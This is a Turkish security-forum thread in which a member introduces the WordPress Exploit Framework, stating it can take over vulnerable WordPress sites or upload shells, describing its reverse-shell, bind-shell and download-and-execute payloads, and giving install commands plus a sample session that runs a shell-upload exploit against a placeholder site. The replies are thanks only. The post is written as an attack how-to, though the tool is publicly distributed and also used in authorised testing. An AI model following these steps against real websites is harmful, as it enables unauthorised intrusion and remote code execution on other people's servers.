THT DUYURU

chat
Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

ugursuz reklam
takipci
Seçenekler

Wordpress Exploit Framework //GHOSTCLOUD

GHOST CLOUD - ait Kullanıcı Resmi (Avatar)
Hevesli Üye
Üyelik tarihi:
06/2015
Nereden:
ÖTÜKEN
Mesajlar:
2.534
Konular:
265
Teşekkür (Etti):
282
Teşekkür (Aldı):
553
Ticaret:
(0) %
6
4294
24-10-2018 00:12
#1
Wordpress Exploit Framework





Wordpress sitelerde bulunan birçok exploit zaafiyetini Wordpress Exploit Framework kullanarak ele geçirebilir veya shell yükleyebilirsiniz.
İçerisinde 288 Exploit, 58 Auxilaries, 7 Payload bulunmaktadır.


Exploit ve Auxiliary Modülleri Arasındaki Farklar

Auxiliary modülleri, hedef makineden bilgi almanıza, ayrıcalıkları yükseltmenize veya hizmet işlevselliklerini reddetmenize olanak tanır. Tüm bunları yaparken karşı makinede yük çalıştırmaz.

Exploit modülleri, exploit cihaza atıldıktan sonra çalıştırılan, makineden bilgi toplamak, uzaktan shell veya web sunucusuna bağlanmak için rastgele kod çalıştırmanıza olanak sağlayan paketler bulunduran bir derlemedir.


Yüklü Payloadlar

bind_php: Belirli bir bağlantı noktasına bağlanacak ve WPXF'nin shell oluşturmasına izin verecek bir komut dosyası yükler.

custom: Özel bir PHP betiğini yükler ve çalıştırır.

download_exec: İndirilebilen ve uzaktan çalıştırılabilen bir dosyayı çalıştırır.

exec: Uzak sunucuda bir shell komutu çalıştırır ve çıktıyı WPXF oturumuna döndürür.

reverse_tcp: Ters TCP shell' oluşturacak bir komut dosyası


Ön Kurulum

Eğer bundler sisteminizde yüklü değilse yükleyiniz.

Kod:
gem install bundler

C uzantılarını derlemek için gerekli tüm araçlara sahip olduğunuzdan emin olun.

Kod:
sudo apt-get install build-essential patch

Ayrıca, geliştirme dosyalarının sisteminizde yüklü olduğundan emin olun.

Kod:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

Kurulum

Öncelikle kurulum için Masaüstüne geliyoruz.(Rahatça erişebilmek için masaüstüne yüklüyorum, isteyenler ana dizine yükleyebilirler.)

Kod:
cd Desktop


Daha sonra github'dan frameworkümüzü indirmek için aşağıdaki kodu giriyoruz.

Kod:
git clone https://github.com/rastating/wordpress-exploit-framework.git


Masaüstüne indirdiğimiz klasörümüze giriyoruz.

Kod:
cd wordpress-exploit-framework


Framework kurulumunu çalıştırıyoruz.(Sistemde yönetici olduğunuzdan emin olun.)

Kod:
bash rebuild_and_install_gem.sh


Framework'ümüzü açıyoruz.

Kod:
ruby wpxf.rb


Ve bizi exploit framework'ümüzün girişi karşılıyor.



Örnek Kullanım

Kod:
wpxf > use exploit/shell/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wordpresssite     //wordpress açıklı site

[+] Set host => wordpresssite

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ //Açığın bulunduğu satır

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec    //Exploit için seçtiğimiz payload

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"   //Yüklenen shellde vermek istediğimiz mesaj

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run    //Çalıştırma komutu

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

Bunun gibi birçok exploit ve auxiliary mevcuttur. Bulmak için:

Kod:
show payloads
Kod:
show exploits
Kod:
show auxiliaries
---------------------
Hiçbir şeye ihtiyacımız yok, yaInız bir şeye ihtiyacımız vardır; çaIışkan oImak!
_____________________________________________

TÜRK
Konu GHOST CLOUD tarafından (24-10-2018 18:10 Saat 18:10 ) değiştirilmiştir.
ch_arli41, 'TÜRKÇÜ, RedLinee Teşekkür etti.
ch_arli41 - ait Kullanıcı Resmi (Avatar)
Red Team Lideri
Üyelik tarihi:
07/2009
Mesajlar:
1.029
Konular:
79
Teşekkür (Etti):
751
Teşekkür (Aldı):
768
Ticaret:
(0) %
24-10-2018 00:31
#2
Eline sağlık güzel konu olmuş.
---------------------
GHOST CLOUD Teşekkür etti.
oldnco - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
09/2017
Yaş:
30
Mesajlar:
1.529
Konular:
43
Teşekkür (Etti):
637
Teşekkür (Aldı):
368
Ticaret:
(0) %
24-10-2018 00:50
#3
Emeğine sağlık. Güzel konu olmuş.
--------------------- 💫 Alles wird sehr schön werden
GHOST CLOUD Teşekkür etti.
CiHaN-i TuRaN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
TURAN
Yaş:
28
Mesajlar:
1.547
Konular:
217
Teşekkür (Etti):
2616
Teşekkür (Aldı):
496
Ticaret:
(0) %
24-10-2018 12:36
#4
Ellerinize Sağlık Komutan
---------------------
Kod:
Dikkatli Geçirilen Vakit Nakittir..! Kader Zamanı Takip Eder..! Zaman İşe Kaderi Kaderin Çizdiği Yol Başarısız Olsa Bile Başarmak..! Mimar Sinan Gibi İş Yap. Kanun-i Sultan Süleyman Han Gibi Büyü Cesaret insanı zafere , kararsızlık tehlikeye , korkaklık ise ölüme götürür. Sen Onlara Hükmediyorsan Onlar Sana Hükmederler
GHOST CLOUD Teşekkür etti.
'Creative - ait Kullanıcı Resmi (Avatar)
Hevesli Üye
Üyelik tarihi:
03/2017
Mesajlar:
3.165
Konular:
95
Teşekkür (Etti):
211
Teşekkür (Aldı):
1064
Ticaret:
(0) %
24-10-2018 12:43
#5
Eline Sağlık Güzel Konu
---------------------
‘’ Hevesli üye yazdığına bakmayın hevesli değilim. Tşk.
GHOST CLOUD Teşekkür etti.
RedLinee - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
05/2014
Nereden:
.php | .js
Mesajlar:
209
Konular:
24
Teşekkür (Etti):
126
Teşekkür (Aldı):
49
Ticaret:
(0) %
24-10-2018 13:52
#6
Muhteşemsiniz. Eline gözüne emeğine sağlık 😋
---------------------
"Uyuyan milletler ya ölür,
Ya da köle olarak uyanır!"
GHOST CLOUD Teşekkür etti.
RooTGHoST - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2018
Nereden:
38
Mesajlar:
1.444
Konular:
38
Teşekkür (Etti):
444
Teşekkür (Aldı):
264
Ticaret:
(0) %
24-10-2018 14:04
#7
Emeğinize Sağlık Hocam..
GHOST CLOUD Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler